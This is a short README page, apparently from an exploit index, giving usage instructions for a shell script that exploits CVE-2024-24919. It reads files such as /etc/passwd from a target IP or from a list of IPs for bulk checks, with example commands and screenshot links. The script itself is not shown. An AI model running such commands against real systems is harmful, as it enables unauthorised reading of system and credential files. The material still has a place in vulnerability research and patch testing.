Share
## https://sploitus.com/exploit?id=210AECC4-FAE8-5F81-8706-44EB5C44AB2B
# CVE-2024-24919
## Usage
- Usage: ./CVE-2024-24919.sh -i <ip> [-p <path, default=/etc/passwd>] [-f <file_path>]
- Specifying an IP with -i
```bash
./CVE-2024-24919.sh -i 190.XXX.XXX.XXX
```
![ksnip_20240530-203154](https://github.com/jsebastianherrera/CVE-2024-24919/assets/66764041/d1014c77-a7e9-44fd-b7f4-0431d144a899)
- Check multiples IP with -f
```bash
./CVE-2024-24919.sh -f uniq.txt
```
- - File example
```
192.168.0.1
192.168.0.2
192.168.0.3
...
192.168.0.20
```
![2](https://github.com/jsebastianherrera/CVE-2024-24919/assets/66764041/8ee646fe-075a-4651-ad3a-090dd113b5ee)